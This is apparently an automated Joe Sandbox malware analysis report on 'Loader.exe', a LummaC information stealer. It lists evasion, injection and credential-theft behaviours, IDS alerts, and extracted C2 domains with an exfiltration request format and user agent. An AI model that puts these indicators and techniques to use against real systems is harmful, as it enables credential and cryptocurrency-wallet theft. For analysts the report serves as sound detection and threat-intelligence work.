Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1582869
MD5:287009edb0ce8e161d3a6328864fcf30
SHA1:888dffb2851bae70ceeaf18d0ab2abd6361d3976
SHA256:7c13fd5a81f9aeca85799bc1cff61329599d032569287d8b2db7b43d3a51df30
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • Loader.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 287009EDB0CE8E161D3A6328864FCF30)
    • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • Loader.exe (PID: 1980 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 287009EDB0CE8E161D3A6328864FCF30)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "stingyerasjhru.click", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "pqZnKP--Z2xsZXhl"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 8 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:27.808066+010020283713Unknown Traffic192.168.11.2049755172.67.157.249443TCP
                2024-12-31T17:42:28.757362+010020283713Unknown Traffic192.168.11.2049756172.67.157.249443TCP
                2024-12-31T17:42:30.125095+010020283713Unknown Traffic192.168.11.2049757172.67.157.249443TCP
                2024-12-31T17:42:31.498061+010020283713Unknown Traffic192.168.11.2049758172.67.157.249443TCP
                2024-12-31T17:42:32.922949+010020283713Unknown Traffic192.168.11.2049759172.67.157.249443TCP
                2024-12-31T17:42:34.575563+010020283713Unknown Traffic192.168.11.2049760172.67.157.249443TCP
                2024-12-31T17:42:36.328647+010020283713Unknown Traffic192.168.11.2049761172.67.157.249443TCP
                2024-12-31T17:42:40.735775+010020283713Unknown Traffic192.168.11.2049762172.67.157.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:28.480934+010020546531A Network Trojan was detected192.168.11.2049755172.67.157.249443TCP
                2024-12-31T17:42:29.480257+010020546531A Network Trojan was detected192.168.11.2049756172.67.157.249443TCP
                2024-12-31T17:42:41.414171+010020546531A Network Trojan was detected192.168.11.2049762172.67.157.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:28.480934+010020498361A Network Trojan was detected192.168.11.2049755172.67.157.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:29.480257+010020498121A Network Trojan was detected192.168.11.2049756172.67.157.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:27.808066+010020586271Domain Observed Used for C2 Detected192.168.11.2049755172.67.157.249443TCP
                2024-12-31T17:42:28.757362+010020586271Domain Observed Used for C2 Detected192.168.11.2049756172.67.157.249443TCP
                2024-12-31T17:42:30.125095+010020586271Domain Observed Used for C2 Detected192.168.11.2049757172.67.157.249443TCP
                2024-12-31T17:42:31.498061+010020586271Domain Observed Used for C2 Detected192.168.11.2049758172.67.157.249443TCP
                2024-12-31T17:42:32.922949+010020586271Domain Observed Used for C2 Detected192.168.11.2049759172.67.157.249443TCP
                2024-12-31T17:42:34.575563+010020586271Domain Observed Used for C2 Detected192.168.11.2049760172.67.157.249443TCP
                2024-12-31T17:42:36.328647+010020586271Domain Observed Used for C2 Detected192.168.11.2049761172.67.157.249443TCP
                2024-12-31T17:42:40.735775+010020586271Domain Observed Used for C2 Detected192.168.11.2049762172.67.157.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:27.392052+010020586261Domain Observed Used for C2 Detected192.168.11.20524641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:42:32.356036+010020480941Malware Command and Control Activity Detected192.168.11.2049758172.67.157.249443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://stingyerasjhru.click/apibcaAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/api=Avira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/sqgAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiqSAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apitreakAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apintOSAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/VgAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiCAvira URL Cloud: Label: malware
                Source: stingyerasjhru.clickAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/xgAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/Avira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/RdAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/FAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/CAvira URL Cloud: Label: malware
                Source: rabidcowse.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/TAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/aRdAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/m$gAvira URL Cloud: Label: malware
                Source: wholersorie.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/OgAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/eAvira URL Cloud: Label: malware
                Source: cloudewahsj.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apirAvira URL Cloud: Label: malware
                Source: noisycuttej.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apieAvira URL Cloud: Label: malware
                Source: nearycrepso.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/bxgAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiVAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/sAvira URL Cloud: Label: malware
                Source: tirepublicerj.shopAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiorAvira URL Cloud: Label: malware
                Source: https://stingyerasjhru.click/apiPAvira URL Cloud: Label: malware
                Source: framekgirus.shopAvira URL Cloud: Label: malware
                Source: abruptyopsn.shopAvira URL Cloud: Label: malware
                Source: 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "stingyerasjhru.click", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "pqZnKP--Z2xsZXhl"}
                Source: Loader.exeReversingLabs: Detection: 29%
                Source: Loader.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stingyerasjhru.click
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pqZnKP--Z2xsZXhl
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041929D CryptUnprotectData,3_2_0041929D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418B32 CryptUnprotectData,3_2_00418B32
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415BB7 CryptUnprotectData,3_2_00415BB7
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49762 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CDB6E8 FindFirstFileExW,0_2_00CDB6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CDB799
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CDB6E8 FindFirstFileExW,3_2_00CDB6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CDB799
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [edi], ax3_2_0043C943
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+46CE1FD7h]3_2_00421A9F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h3_2_00421A9F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [eax+edx]3_2_0040BB49
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-18564150h]3_2_00418B32
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h3_2_00420450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000000B0h]3_2_0040E460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], bl3_2_0040CDF5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042B660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042AE1D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, edx3_2_00408680
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+341B10A6h]3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EABBD981h3_2_0040D864
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00434070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ebx, byte ptr [eax+edx]3_2_0043E010
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043E010
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C017
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ebx, byte ptr [eax+edx]3_2_0043E0D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043E0D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042B94C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ebx, byte ptr [eax+edx]3_2_0043E160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043E160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_004159D8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]3_2_004029E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_00405980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax3_2_00405980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov al, 01h3_2_0043D189
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042820E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+edi+1AAFB8ABh]3_2_0042821B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C2C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042B2D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042B2D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_00429B50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042CB27
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]3_2_00438BF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, edx3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9EB5184Bh3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [00445864h]3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042A454
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043E4C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004074E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004074E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-353DC4A8h]3_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 7F7BECC6h3_2_0043B490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042A4AB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-5D841D24h]3_2_00424D50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ebx, byte ptr [eax+edx]3_2_0043DD50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043DD50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041FD70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push esi3_2_00420573
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 4B1BF3DAh3_2_00414D12
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 37A3DD63h3_2_00414D12
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-5D841D24h]3_2_00424DD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, dword ptr [ebp-18h]3_2_004275D8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042B5BA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042B5BA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042B66B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esi+04h], edi3_2_0042BE79
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042BE79
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx ebx, byte ptr [eax+edx]3_2_0043DEC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0043DEC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h3_2_00429690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1Fh]3_2_00409770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx]3_2_0043F700
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+5F7FB8E0h]3_2_00415F2D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-5D841D18h]3_2_0042878C

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058626 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stingyerasjhru .click) : 192.168.11.20:52464 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49762 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49761 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49760 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49755 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49757 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49759 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49756 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49758 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49756 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49755 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49756 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49755 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49758 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49762 -> 172.67.157.249:443
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: stingyerasjhru.click
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49762 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49760 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49755 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49759 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49756 -> 172.67.157.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49758 -> 172.67.157.249:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
